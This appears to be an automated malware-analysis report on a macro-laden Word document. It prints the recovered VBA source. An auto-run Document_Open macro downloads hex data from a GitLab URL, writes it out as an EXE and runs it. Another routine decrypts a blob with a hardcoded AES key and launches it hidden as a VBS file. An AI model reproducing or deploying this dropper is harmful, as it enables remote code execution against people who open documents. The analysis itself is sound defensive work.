              Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
              Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
              Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
              #End If
          #End If
          
          '=========================================================================
          ' Constants and member variables
          '=========================================================================
          
          Private Const AES_BLOCK_SIZE        As Long = 16
          Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-192, 16 -> AES-128
          Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
          Private Const KDF_SALTLEN           As Long = 8
          Private Const KDF_ITER              As Long = 10000
          Private Const KDF_HASH              As String = "SHA512"
          Private Const HMAC_HASH             As String = "SHA256"
          Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
          Private Const OPENSSL_MAGICLEN      As Long = 8
          Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
          Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"
          
          Private Type UcsCryptoContextType
              hPbkdf2Alg          As LongPtr
              hHmacAlg            As LongPtr
              hHmacHash           As LongPtr
              HashLen             As Long
              hAesAlg             As LongPtr
              hAesKey             As LongPtr
              AesKeyObjData()     As Byte
              AesKeyObjLen        As Long
              Nonce(0 To 3)       As Long
              EncrData()          As Byte
              EncrPos             As Long
              LastError           As String
          End Type
          
          Private m_uChunkedCtx           As UcsCryptoContextType
          
          '=========================================================================
          ' Functions
          '=========================================================================
          
          '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
          Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
              Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
              Dim baData()        As Byte
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim sError          As String
              
              baData = ToUtf8Array(sText)
              baPass = vbNullString
              baSalt = vbNullString
              If Not IsArray(Password) Then
                  If Not IsMissing(Password) Then
                      baPass = ToUtf8Array(Password & vbNullString)
                  End If
                  ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                  Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
              Else
                  baKey = Password
              End If
              If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
                  Err.Raise vbObjectError, , sError
              End If
              If Not IsArray(Password) Then
                  ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
                  If UBound(baData) >= PREFIXLEN Then
                      Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
                  End If
                  Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
                  Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
              End If
              AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
          End Function
          
          '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
          Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
              Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
              Dim baData()        As Byte
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim sMagic          As String
              Dim sError          As String
              
              baData = FromBase64Array(sEncr)
              baPass = vbNullString
              baSalt = vbNullString
              If Not IsArray(Password) Then
                  If Not IsMissing(Password) Then
                      baPass = ToUtf8Array(Password & vbNullString)
                  End If
                  If UBound(baData) >= PREFIXLEN - 1 Then
                      sMagic = String$(OPENSSL_MAGICLEN, 0)
                      Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
                      If sMagic = OPENSSL_MAGIC Then
                          ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                          Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                          If UBound(baData) >= PREFIXLEN Then
                              Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                              ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                          Else
                              baData = vbNullString
                          End If
                      End If
                  End If
              Else
                  baKey = Password
              End If
              If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
                  Err.Raise vbObjectError, , sError
              End If
              AesDecryptString = FromUtf8Array(baData)
          End Function
          
          Public Function AesCryptArray(baData() As Byte, Optional Password As Variant, Optional Salt As Variant, Optional key As Variant, Optional ByVal KeyLen As Long, Optional Error As String, Optional Hmac As Variant) As Boolean
              Const VT_BYREF      As Long = &H4000
              Dim uCtx            As UcsCryptoContextType
              Dim vErr            As Variant
              Dim bHashBefore     As Boolean
              Dim bHashAfter      As Boolean
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim baTemp()        As Byte
              Dim lPtr            As LongPtr
              
              On Error GoTo EH
              If IsArray(Hmac) Then
                  bHashBefore = (Hmac(0) <= 0)
                  bHashAfter = (Hmac(0) > 0)
              End If
              If IsMissing(Password) Then
                  baPass = vbNullString
              ElseIf IsArray(Password) Then
                  baPass = Password
              Else
                  baPass = ToUtf8Array(Password & vbNullString)
              End If
              If IsMissing(Salt) Then
                  baSalt = baPass
              ElseIf IsArray(Salt) Then
                  baSalt = Salt
              Else
                  baSalt = ToUtf8Array(Salt & vbNullString)
              End If
              If IsArray(key) Then
                  baKey = key
              End If
              If KeyLen <= 0 Then
                  KeyLen = AES_KEYLEN
              End If
              If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
                  Error = uCtx.LastError
                  GoTo QH
              End If
              If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
                  Error = uCtx.LastError
                  GoTo QH
              End If
              If IsArray(Hmac) Then
                  baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
                  #If Win64 Then
                      lPtr = PeekPtr(VarPtr(Hmac) + 8)
                  #Else
                      lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
                  #End If
                  If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
                      lPtr = PeekPtr(lPtr)
                  End If
                  #If Win64 Then
                      lPtr = PeekPtr(lPtr + 16)
                  #Else
                      lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
                  #End If
                  Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
              End If
              '--- success
              AesCryptArray = True
          QH:
              pvCryptoAesCtrTerminate uCtx
              Exit Function
          EH:
              vErr = Array(Err.Number, Err.Source, Err.Description)
              pvCryptoAesCtrTerminate uCtx
              Err.Raise vErr(0), vErr(1), vErr(2)
          End Function
          
          Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
              Dim baEmpty()       As Byte
              Dim baKey()         As Byte
              
              pvCryptoAesCtrTerminate m_uChunkedCtx
              baEmpty = vbNullString
              If IsArray(key) Then
                  baKey = key
              End If
              If KeyLen <= 0 Then
                  KeyLen = AES_KEYLEN
              End If
              AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
          End Function
          
          Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
              If m_uChunkedCtx.hAesAlg = 0 Then
                  m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
                  Exit Function
              End If
              baOutput = baInput
              AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
              If Final Then
                  pvCryptoAesCtrTerminate m_uChunkedCtx
              End If
          End Function
          
          Public Function AesChunkedGetLastError() As String
              AesChunkedGetLastError = m_uChunkedCtx.LastError
          End Function
          
          '= private ===============================================================
          
          Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
              Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
              Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
              Dim hResult         As Long
              
              With uCtx
                  '--- init member vars
                  .EncrData = vbNullString
                  .EncrPos = 0
                  .LastError = vbNullString
                  ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
                  If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
                      '--- generate RFC 2898 based derived key
                      On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
                      hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
                      If hResult < 0 Then
                          GoTo QH
                      End If
                      hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
                      If hResult < 0 Then
                          GoTo QH
                      End If
                      On Error GoTo 0
                  End If
                  '--- init AES key from first half of derived key
                  On Error GoTo EH_Unsupported '--- CNG API missing on XP
                  hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  On Error GoTo 0
                  hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
                  hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  '--- init AES IV from second half of derived key
                  Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
                  '--- init HMAC key from last HashLen bytes of derived key
                  hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
              End With
              '--- success
              pvCryptoAesCtrInit = True
              Exit Function
          QH:
              uCtx.LastError = GetSystemMessage(hResult)
              Exit Function
          EH_Unsupported:
              uCtx.LastError = ERR_UNSUPPORTED_ENCR
          End Function
          
          Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
              With uCtx
                  If .hPbkdf2Alg <> 0 Then
                      Call BCryptCloseAlgorithmProvider(.

          General
          Stream Path:Macros/VBA/ViewSession
          VBA File Name:ViewSession.cls
          Stream Size:11978
          Attribute VB_Name = "ViewSession"
          Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = False
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = False
          
          Public Sub ikwiwiejs_19293_Ade()
              Dim key As String
              Dim decryptedText As String
              Dim i As Integer
              Dim parts(1 To 60) As String
              Dim Oekksoioa_ As String
              Dim chunkSize As Integer
              Dim tempFilePath As String
          
              ' Set the AES key
              key = "Bnshekao@3123989942"    ' 16-byte key for AES
              ' part1 .. part24: Base64 ciphertext chunks assigned here (24 string literals, omitted)
              Dim encryptedText As String
              encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
              decryptedText = AesDecryptString(encryptedText, key)    ' Decrypt
          
              ' Size of each part
              chunkSize = 3000  ' Size of each part
              Dim outputFilePath As String
              ' Save the entire decrypted content to a VBS file
              vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
          
              ' Write each part to the file
              Open vbsFilePath For Output As #1
              For i = 1 To Len(decryptedText) Step chunkSize
                  partText = Mid(decryptedText, i, chunkSize)
                  Print #1, partText  ' Write each part to the file
              Next i
              Close #1
          
          Dim shell As Object
          Set shell = CreateObject("Shell.Application")
          
          ' Run the VBS file in hidden mode (if supported)
          shell.ShellExecute vbsFilePath, "", "", "open", 0
          
              
          
          End Sub
          
          Private Sub Class_Initialize()
              
          End Sub
          

          General
          Stream Path:Macros/VBA/ksksksksksksks
          VBA File Name:ksksksksksksks.cls
          Stream Size:1441
          Attribute VB_Name = "ksksksksksksks"
          Attribute VB_Base = "1Normal.ThisDocument"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = True
          Attribute VB_Customizable = True
          Private Sub Document_Open()
              Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"
          End Sub
          
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.235956365095031
          Base64 Encoded:True
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:0.2427468033329246
          Base64 Encoded:False
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:0.45444014931703014
          Base64 Encoded:False
          General
          Stream Path:1Table
          CLSID:
          File Type:data
          Stream Size:7563
          Entropy:5.842344693433376
          Base64 Encoded:True
          General
          Stream Path:Macros/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:598
          Entropy:5.2911106056391715
          Base64 Encoded:True
          General
          Stream Path:Macros/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:155
          Entropy:3.107165469264921
          Base64 Encoded:False
          General
          Stream Path:Macros/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:8089
          Entropy:5.662084075475776
          Base64 Encoded:True
          General
          Stream Path:Macros/VBA/dir
          CLSID:
          File Type:data
          Stream Size:653
          Entropy:6.421648833038081
          Base64 Encoded:True
          General
          Stream Path:WordDocument
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:1.0834551557408363
          Base64 Encoded:False
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Jan 14, 2025 15:19:43.891561031 CET | 52557 | 53 | 192.168.2.5 | 162.159.36.2
          Jan 14, 2025 15:19:43.896306992 CET | 53 | 52557 | 162.159.36.2 | 192.168.2.5
          Jan 14, 2025 15:19:43.896384001 CET | 52557 | 53 | 192.168.2.5 | 162.159.36.2
          Jan 14, 2025 15:19:43.901273966 CET | 53 | 52557 | 162.159.36.2 | 192.168.2.5
          Jan 14, 2025 15:19:44.350414038 CET | 52557 | 53 | 192.168.2.5 | 162.159.36.2
          Jan 14, 2025 15:19:44.355638027 CET | 53 | 52557 | 162.159.36.2 | 192.168.2.5
          Jan 14, 2025 15:19:44.355706930 CET | 52557 | 53 | 192.168.2.5 | 162.159.36.2

          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Jan 14, 2025 15:19:43.890775919 CET | 53 | 65014 | 162.159.36.2 | 192.168.2.5
          Jan 14, 2025 15:19:44.362106085 CET | 59205 | 53 | 192.168.2.5 | 1.1.1.1
          Jan 14, 2025 15:19:44.370132923 CET | 53 | 59205 | 1.1.1.1 | 192.168.2.5

          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Jan 14, 2025 15:19:44.362106085 CET | 192.168.2.5 | 1.1.1.1 | 0x4b7e | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Jan 14, 2025 15:19:11.790977955 CET | 1.1.1.1 | 192.168.2.5 | 0xb002 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
          Jan 14, 2025 15:19:11.790977955 CET | 1.1.1.1 | 192.168.2.5 | 0xb002 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
          Jan 14, 2025 15:19:11.790977955 CET | 1.1.1.1 | 192.168.2.5 | 0xb002 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
          Jan 14, 2025 15:19:44.370132923 CET | 1.1.1.1 | 192.168.2.5 | 0x4b7e | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false


          Target ID:0
          Start time:09:19:12
          Start date:14/01/2025
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Imagebase:0xcf0000
          File size:1'620'872 bytes
          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Call Graph

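          Legend: Entrypoint, Decryption Function, Executed, Not Executed

          Nodes (ID, function, referenced APIs with counts):
          2 CallTestAES
          2613 ikwiwiejs_19293_Ade (Len:1, Environ:1, Mid:1, CreateObject:1, ShellExecute:1)
          14 HexToBinary (Len:1, CByte:1, Mid:1)
          73 GetDataFromURL (Status:1, responseText:1, CreateObject:1, Open:1, Send:1)
          119 DownloadAndRunEXE (MsgBox:3, LBound:1, Len:1, Environ:1, FreeFile:1, Run:1, UBound:1, CreateObject:1, Dir:1)
          452 AesEncryptString (Replace:1, vbNullString:4, UBound:3, IsMissing:1, Raise:1)
          846 AesCryptArray (Array:1, Description:1, vbNullString:3, Number:1, Err:3, UBound:2, VarPtr:3, IsMissing:2, Raise:1, Source:1)
          2193 ToBase64Array (Left$:1, Len:1, UBound:3, VarPtr:1)
          2347 ToUtf8Array (Len:2, vbNullString:1)
          646 AesDecryptString (vbNullString:4, UBound:4, IsMissing:1, Raise:1)
          2270 FromBase64Array (Len:2, vbNullString:1, VarPtr:1)
          2434 FromUtf8Array (Left$:1, Len:1, UBound:3)
          1281 pvCryptoAesCtrInit (vbNullString:2, UBound:3)
          1636 pvCryptoAesCtrTerminate
          1712 pvCryptoAesCtrCrypt (UBound:1)
          2014 pvCryptoGetFinalHash
          2590 PeekPtr
          1185 AesChunkedInit (vbNullString:1)
          1236 AesChunkedCryptArray
          1275 AesChunkedGetLastError
          2507 GetSystemMessage (Left$:1, Len:1, Mid$:1, Hex:1)
          2057 pvInc
          2096 Get pvArrayPtr (LBound:2, UBound:1, VarPtr:1)
          2153 Get pvArraySize (LBound:1, UBound:1)
          2841 Class_Initialize
          2851 Document_Open (Now:1, TimeValue:1)

          Calls (caller -> callee):
          2 CallTestAES -> 2613 ikwiwiejs_19293_Ade
          119 DownloadAndRunEXE -> 14 HexToBinary
          119 DownloadAndRunEXE -> 73 GetDataFromURL
          452 AesEncryptString -> 846 AesCryptArray
          452 AesEncryptString -> 2193 ToBase64Array
          452 AesEncryptString -> 2347 ToUtf8Array (x 2)
          646 AesDecryptString -> 846 AesCryptArray
          646 AesDecryptString -> 2270 FromBase64Array
          646 AesDecryptString -> 2347 ToUtf8Array
          646 AesDecryptString -> 2434 FromUtf8Array
          846 AesCryptArray -> 1281 pvCryptoAesCtrInit
          846 AesCryptArray -> 1636 pvCryptoAesCtrTerminate (x 2)
          846 AesCryptArray -> 1712 pvCryptoAesCtrCrypt
          846 AesCryptArray -> 2014 pvCryptoGetFinalHash
          846 AesCryptArray -> 2347 ToUtf8Array (x 2)
          846 AesCryptArray -> 2590 PeekPtr (x 6)
          1185 AesChunkedInit -> 1281 pvCryptoAesCtrInit
          1185 AesChunkedInit -> 1636 pvCryptoAesCtrTerminate
          1236 AesChunkedCryptArray -> 1636 pvCryptoAesCtrTerminate
          1236 AesChunkedCryptArray -> 1712 pvCryptoAesCtrCrypt
          1281 pvCryptoAesCtrInit -> 2507 GetSystemMessage
          1712 pvCryptoAesCtrCrypt -> 2057 pvInc (x 4)
          1712 pvCryptoAesCtrCrypt -> 2507 GetSystemMessage
          2613 ikwiwiejs_19293_Ade -> 646 AesDecryptString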

          Module: Module1

          Declaration
          Line | Content
          1 | Attribute VB_Name = "Module1"

          APIs | Meta Information
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Environ
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Open
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Len
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Mid
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: CreateObject
          Part of subcall function ikwiwiejs_19293_Ade@ViewSession: ShellExecute

          Line | Instruction | Meta Information
          2 | Public Sub CallTestAES() |
          3 | Dim kakensooe as New ViewSession |
          4 | kakensooe.ikwiwiejs_19293_Ade |
          6 | End Sub |

          Module: Module2

          Declaration
          Line | Content
          1 | Attribute VB_Name = "Module2"
          2 | Option Explicit

          APIs | Meta Information
          Part of subcall function GetDataFromURL@Module2: CreateObject
          Part of subcall function GetDataFromURL@Module2: Open
          Part of subcall function GetDataFromURL@Module2: Send
          Part of subcall function GetDataFromURL@Module2: Status
          Part of subcall function GetDataFromURL@Module2: responseText
          MsgBox
          vbCritical
          Part of subcall function HexToBinary@Module2: Len
          Part of subcall function HexToBinary@Module2: CByte
          Part of subcall function HexToBinary@Module2: Mid
          Environ
          FreeFile
          Open
          LBound
          UBound
          Len
          Dir
          CreateObject
          Run
          MsgBox
          vbInformation
          MsgBox
          vbCritical

          Strings | Decrypted Strings
          "https://gitlab.com/app8490744/updatesa/-/raw/main/up"
          """"
          "Kh\xf4ng t?i du?c d? li?u t? URL."
          "L?i"
          "Kh\xf4ng t?i du?c d? li?u t? URL."
          "L?i"
          "USERPROFILE"
          """"
          "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
          "Th\xe0nh c\xf4ng"
          "WScript.Shell"
          "WScript.Shell"
          """"
          "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
          "Th\xe0nh c\xf4ng"
          "Kh\xf4ng th? t?o file EXE."
          "L?i"
          Line | Instruction | Meta Information
          40 | Sub DownloadAndRunEXE() |
          41 | Dim hexData as String |
          42 | Dim binaryData() as Byte |
          43 | Dim savePath as String |
          44 | Dim fileNum as Integer |
          45 | Dim i as Long |
          48 | hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up") |
          50 | If hexData = "" Then |
          51 | MsgBox "Kh\xf4ng t?i du?c d? li?u t? URL.", vbCritical, "L?i" | MsgBox, vbCritical
          52 | Exit Sub |
          53 | Endif |
          56 | binaryData = HexToBinary(hexData) |
          59 | savePath = Environ("USERPROFILE") & "\Documents\example.exe" | Environ
          60 | fileNum = FreeFile | FreeFile
          62 | Open savePath For Binary As # fileNum | Open
          63 | For i = LBound(binaryData) To UBound(binaryData) | LBound, UBound
          64 | Put # fileNum, , binaryData(i) |
          65 | Next i | LBound, UBound
          66 | Close # fileNum |
          69 | If Len(Dir(savePath)) > 0 Then | Len, Dir
          70 | Dim shell as Object |
          71 | Set shell = CreateObject("WScript.Shell") | CreateObject
          74 | shell.Run """" & savePath & """", 1, False | Run
          75 | MsgBox "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!", vbInformation, "Th\xe0nh c\xf4ng" | MsgBox, vbInformation
          76 | Else |
          77 | MsgBox "Kh\xf4ng th? t?o file EXE.", vbCritical, "L?i" | MsgBox, vbCritical
          78 | Endif |
          79 | End Sub |

          APIs | Meta Information

          CreateObject

          Open

          Send

          Status

          responseText

          Strings | Decrypted Strings
          "MSXML2.XMLHTTP"
          "GET"
          """"
          Line | Instruction | Meta Information
          21

          Function GetDataFromURL(url as String) as String

          22

          Dim http as Object

          23

          Set http = CreateObject("MSXML2.XMLHTTP")

          CreateObject

          25

          On Error Resume Next

          26

          http.Open "GET", url, False

          Open

          27

          http.Send

          Send

          29

          If http.Status = 200 Then

          Status

          30

          GetDataFromURL = http.responseText

          responseText

          31

          Else

          32

          GetDataFromURL = ""

          33

          Endif

          35

          On Error Goto 0

          36

          Set http = Nothing

          37

          End Function

          APIs | Meta Information

          Len

          CByte

          Mid

          Strings | Decrypted Strings
          "&H"
          "&H"
          Line | Instruction | Meta Information
          5

          Function HexToBinary(hexString as String) as Byte()

          6

          Dim i as Long

          7

          Dim length as Long

          8

          Dim byteArray() as Byte

          10

          length = Len(hexString) \ 2

          Len

          11

          Redim byteArray(length - 1)

          13

          For i = 0 To length - 1

          14

          byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))

          CByte

          Mid

          15

          Next i

          17

          HexToBinary = byteArray

          18

          End Function

          Module: Module3

          Declaration
          Line | Content
          1

          Attribute VB_Name = "Module3"

          3

          Option Explicit

          4

          DefObj A-Z

          12

          #if Win64 then

          13

          Private Const PTR_SIZE as Long = 8

          14

          #else

          15

          Private Const PTR_SIZE as Long = 4

          16

          #endif

          18

          #if HasPtrSafe then

          19

          Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory"(lpvDest as Any, lpvSource as Any, ByVal cbCopy as LongPtr)

          20

          Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr"(Ptr() as Any) as LongPtr

          21

          Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong as Long) as Long

          22

          Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036"(RandomBuffer as Any, ByVal RandomBufferLength as Long) as Long

          24

          Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm as LongPtr, ByVal pszAlgId as LongPtr, ByVal pszImplementation as LongPtr, ByVal dwFlags as Long) as Long

          25

          Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm as LongPtr, ByVal dwFlags as Long) as Long

          26

          Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, pbOutput as Any, ByVal cbOutput as Long, cbResult as Long, ByVal dwFlags as Long) as Long

          27

          Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, ByVal pbInput as LongPtr, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

          28

          Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phKey as LongPtr, pbKeyObject as Any, ByVal cbKeyObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

          29

          Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey as LongPtr) as Long

          30

          Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal pPaddingInfo as LongPtr, ByVal pbIV as LongPtr, ByVal cbIV as Long, pbOutput as Any, ByVal cbOutput as Long, pcbResult as Long, ByVal dwFlags as Long) as Long

          31

          Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf as LongPtr, pbPassword as Any, ByVal cbPassword as Long, pbSalt as Any, ByVal cbSalt as Long, ByVal cIterations as Currency, pbDerivedKey as Any, ByVal cbDerivedKey as Long, ByVal dwFlags as Long) as Long

          32

          Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phHash as LongPtr, ByVal pbHashObject as LongPtr, ByVal cbHashObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long

          33

          Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash as LongPtr) as Long

          34

          Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal dwFlags as Long) as Long

          35

